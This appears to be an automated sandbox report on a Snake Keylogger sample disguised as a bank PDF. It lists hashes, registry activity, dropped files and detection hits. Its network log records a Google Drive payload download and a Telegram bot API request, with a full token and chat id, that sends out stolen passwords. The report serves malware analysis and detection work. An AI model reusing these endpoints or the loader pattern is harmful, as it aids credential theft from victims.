File name:	BankSwiftandSOAPRN0072700314159453_pdf.exe
Full analysis:	https://app.any.run/tasks/2c156cf8-6588-41b5-b1e5-e1515c8f14a9
Verdict:	Malicious activity
Threats:	A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	December 10, 2024, 15:37:07
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	evasion snake keylogger stealer ims-api generic telegram
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:	38499DDE4BD6169EF983FC23EEBC2642
SHA1:	80C78C8F8B498528B4AAE2B569A5656B17D98993
SHA256:	6F45BD0535F4654EA024F6336CDEECBC44272C903353963A7D7A0F8D8E74A51E
SSDEEP:	49152:atNtm2+bHSew2K1biAYcZGnTYkYHnt4OWsZTCo4deOqcCIEDj2J0XIQBZt9m+t2e:0N82eyrccknsktOWsZTCo8eOVNEDj40V

.exe	\|	Win32 Executable MS Visual C++ (generic) (67.4)
.dll	\|	Win32 Dynamic Link Library (generic) (14.2)
.exe	\|	Win32 Executable (generic) (9.7)
.exe	\|	Generic Win/DOS Executable (4.3)
.exe	\|	DOS Executable Generic (4.3)

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2018:12:15 22:24:36+00:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit
PEType:	PE32
LinkerVersion:	6
CodeSize:	26112
InitializedDataSize:	141824
UninitializedDataSize:	2048
EntryPoint:	0x34a5
OSVersion:	4
ImageVersion:	6
SubsystemVersion:	4
Subsystem:	Windows GUI
FileVersionNumber:	1.5.0.0
ProductVersionNumber:	1.5.0.0
FileFlagsMask:	0x0000
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	English (U.S.)
CharacterSet:	Windows, Latin1
Comments:	pleurosaurus obfuscates
CompanyName:	mangler bronchia bedrevne
FileDescription:	privatbil efterhaandsoplysning
FileVersion:	1.5.0.0
InternalName:	supraocular tailorizes.exe
LegalCopyright:	blindlandings
OriginalFileName:	supraocular tailorizes.exe


(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Service
Operation:	write	Name:	System_Check
Value: user32::EnumWindows(i r2 ,i 0)
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\Stormskadeserstatninger\Uninstall\Trsteprmie\kartoflerne
Operation:	write	Name:	trsteges
Value: 0
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CLI\Start
Operation:	write	Name:	CLI start
Value: 2
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Service
Operation:	write	Name:	System_Check
Value: kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Service
Operation:	write	Name:	System_Check
Value: kernel32::SetFilePointer(i r5, i 13101 , i 0,i 0)
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Service
Operation:	write	Name:	System_Check
Value: kernel32::VirtualAlloc(i 0,i 22454272, i 0x3000, i 0x40)p.r2
(PID) Process:	(4816) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Service
Operation:	write	Name:	System_Check
Value: kernel32::ReadFile(i r5, i r2, i 22454272,*i 0, i 0)
(PID) Process:	(1804) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BankSwiftandSOAPRN0072700314159453_pdf_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(1804) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BankSwiftandSOAPRN0072700314159453_pdf_RASAPI32
Operation:	write	Name:	EnableAutoFileTracing
Value: 0
(PID) Process:	(1804) BankSwiftandSOAPRN0072700314159453_pdf.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BankSwiftandSOAPRN0072700314159453_pdf_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0

PID	Process	Filename		Type
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\Transformere.Tre		abr
		MD5:E5203513A960CCCDA9E297C1F85C884A	SHA256:BA22E538F66749BA3EF26AAC3122D742142D6225789E7A7F9C38463DF2AB81C6
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\Hecatontarchy.ave		binary
		MD5:20B50CBF8E54C203402A467020159BB1	SHA256:3B5CB97C0BB05C0F99E84D0B3422B1D35ED2553A9B3901789BBC2A6E8549CFAB
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\prepares.pli		binary
		MD5:B0FB6B583D6902DE58E1202D12BA4832	SHA256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\Sensuousnesses.opk		abr
		MD5:A4340182CDDD2EC1F1480360218343F9	SHA256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\Kbmandsskole.str		abr
		MD5:4D1D72CFC5940B09DFBD7B65916F532E	SHA256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Temp\nsn839C.tmp		binary
		MD5:5132ABFF523DC6D32599E425711EE429	SHA256:B8BB31E151795321BB65CC848642017A2FE4BBEFB5D9CAE1DCE7C50135770EB5
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Iw\14-scaled.jpg		image
		MD5:5C727AE28F0DECF497FBB092BAE01B4E	SHA256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
4816	BankSwiftandSOAPRN0072700314159453_pdf.exe	C:\Users\admin\AppData\Local\Temp\nsi8504.tmp\System.dll		executable
		MD5:0D7AD4F45DC6F5AA87F606D0331C6901	SHA256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	303	142.250.184.206:443	https://drive.google.com/uc?export=download&id=1lYqT9D1UwwU51WfJrgQT0v5FjPK_rzf-	unknown	—	—	—
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	GET	200	132.226.8.169:80	http://checkip.dyndns.org/	unknown	—	—	malicious
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	GET	200	132.226.8.169:80	http://checkip.dyndns.org/	unknown	—	—	malicious
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	GET	200	132.226.8.169:80	http://checkip.dyndns.org/	unknown	—	—	malicious
—	—	GET	200	188.114.96.3:443	https://reallyfreegeoip.org/xml/217.19.215.70	unknown	text	357 b	malicious
—	—	GET	200	172.217.16.129:443	https://drive.usercontent.google.com/download?id=1lYqT9D1UwwU51WfJrgQT0v5FjPK_rzf-&export=download	unknown	binary	92.0 Kb	whitelisted
—	—	POST	200	149.154.167.99:443	https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=admin%20/%20Passwords%20/%20217.19.215.70	unknown	binary	542 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	142.250.185.238:443	drive.google.com	GOOGLE	US	whitelisted
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	172.217.18.1:443	drive.usercontent.google.com	GOOGLE	US	whitelisted
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	132.226.8.169:80	checkip.dyndns.org	ORACLE-BMC-31898	JP	shared
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	188.114.97.3:443	reallyfreegeoip.org	CLOUDFLARENET	NL	malicious
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	149.154.167.220:443	api.telegram.org	Telegram Messenger Inc	GB	shared

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208	whitelisted
drive.google.com	142.250.185.238	whitelisted
drive.usercontent.google.com	172.217.18.1	whitelisted
checkip.dyndns.org	132.226.8.169 193.122.130.0 158.101.44.242 193.122.6.168 132.226.247.73	shared
reallyfreegeoip.org	188.114.97.3 188.114.96.3	malicious
api.telegram.org	149.154.167.220	shared
self.events.data.microsoft.com	20.189.173.23	whitelisted

PID	Process	Class	Message
2192	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	Device Retrieving External IP Address Detected	ET INFO 404/Snake/Matiex Keylogger Style External IP Check
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
2192	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
2192	svchost.exe	Misc activity	ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	Misc activity	ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
2192	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2192	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
1804	BankSwiftandSOAPRN0072700314159453_pdf.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)

General Info

BankSwiftandSOAPRN0072700314159453_pdf.exe

38499DDE4BD6169EF983FC23EEBC2642

80C78C8F8B498528B4AAE2B569A5656B17D98993

6F45BD0535F4654EA024F6336CDEECBC44272C903353963A7D7A0F8D8E74A51E

49152:atNtm2+bHSew2K1biAYcZGnTYkYHnt4OWsZTCo4deOqcCIEDj2J0XIQBZt9m+t2e:0N82eyrccknsktOWsZTCo8eOVNEDj40V

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Steals credentials from Web Browsers

SNAKEKEYLOGGER has been detected (SURICATA)

Actions looks like stealing of personal data

SUSPICIOUS

Malware-specific behavior (creating "System.dll" in Temp)

Application launched itself

Executable content was dropped or overwritten

Checks for external IP

Checks Windows Trust Settings

Reads security settings of Internet Explorer

The process verifies whether the antivirus software is installed

Possible usage of Discord/Telegram API has been detected (YARA)

Process communicates with Telegram (possibly using it as an attacker's C2 server)

INFO

Reads the computer name

Creates files or folders in the user directory

The sample compiled with english language support

Create files in a temporary directory

Checks supported languages

Checks proxy server information

Reads the machine GUID from the registry

Disables trace logs

Reads the software policy settings

Attempting to use instant messaging service

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings